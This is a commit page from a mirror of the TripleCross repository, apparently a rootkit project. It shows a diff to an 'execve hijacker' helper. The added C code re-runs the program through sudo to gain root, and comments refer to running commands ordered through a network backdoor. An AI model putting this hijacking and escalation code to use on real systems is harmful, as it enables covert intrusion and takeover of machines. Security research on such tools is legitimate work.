admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-19 16:23:08 +08:00
Code Issues Packages Projects Releases Wiki Activity

Now the execve hijacker works without needing a canalizer. Removed it. Also some additional tweaks to the c&c launching of the helper

Browse Source
This commit is contained in:
h3xduck
2022-02-19 11:57:32 -05:00
parent 8e97624326
commit 1ec4ed8486
12 changed files with 2072 additions and 2086 deletions
Download Patch File Download Diff File Expand all files Collapse all files

20
src/helpers/execve_hijack.c
View File

@@ -64,8 +64,22 @@ char* getLocalIpAddress(){
return IPbuffer;
}
int main(int argc, char* argv[]){
int main(int argc, char* argv[], char *envp[]){
printf("Hello world from execve hijacker\n");
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
if(geteuid() != 0){
//We do not have privileges, but we do want them. Let's rerun the program now.
char* args[argc+1];
args[0] = "sudo";
for(int ii=0; ii<argc; ii++){
args[ii+1] = argv[ii];
}
execve("/usr/bin/sudo", args, envp);
}
time_t rawtime;
struct tm * timeinfo;
@@ -74,10 +88,6 @@ int main(int argc, char* argv[]){
timeinfo = localtime ( &rawtime );
char* timestr = asctime(timeinfo);
for(int ii=0; ii<argc; ii++){
printf("Argument %i is %s\n", ii, argv[ii]);
}
//We proceed to fork() and exec the original program, whilst also executing the one we
//ordered to execute via the network backdoor
//int bpf_map_fd = bpf_map_get_fd_by_id()